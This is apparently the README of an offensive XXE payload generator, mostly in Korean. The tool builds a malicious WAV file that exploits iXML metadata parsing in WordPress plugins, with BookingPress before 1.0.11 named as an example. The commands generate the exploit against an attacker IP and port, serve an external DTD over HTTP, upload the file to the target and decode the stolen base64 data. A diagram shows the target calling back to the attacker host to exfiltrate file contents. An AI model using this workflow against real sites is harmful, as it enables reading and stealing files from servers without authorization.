
A XXE payload generator
iXML 메타데이터 청크를 파싱하는 WordPress 플러그인(예: BookingPress < 1.0.11)의 XXE 취약점을 악용하는 악성 WAV 파일을 생성합니다.
# 익스플로잇 파일 생성
python3 expl.py -i 10.10.14.204 -p 9200
# HTTP 서버 시작
python3 -m http.server 9200
# exploit.wav를 대상에 업로드
# 데이터 유출을 위해 로그 모니터링
# 유출된 데이터 디코딩
echo "BASE64_STRING" | base64 -d
┌──────────┐ 1. 업로드 ┌──────────┐
│ 공격자 │ ──exploit.wav─>│ 대상 │
└──────────┘ └──────────┘
▲ │
│ │ 2. XML 파싱
│ │
│ 3. GET /xxe.dtd │
│<───────────────────────────┘
│
│ 4. GET /?p=base64_data
│<───────────────────────────┐
│ │
└─ 데이터 디코딩 및 파일 읽기│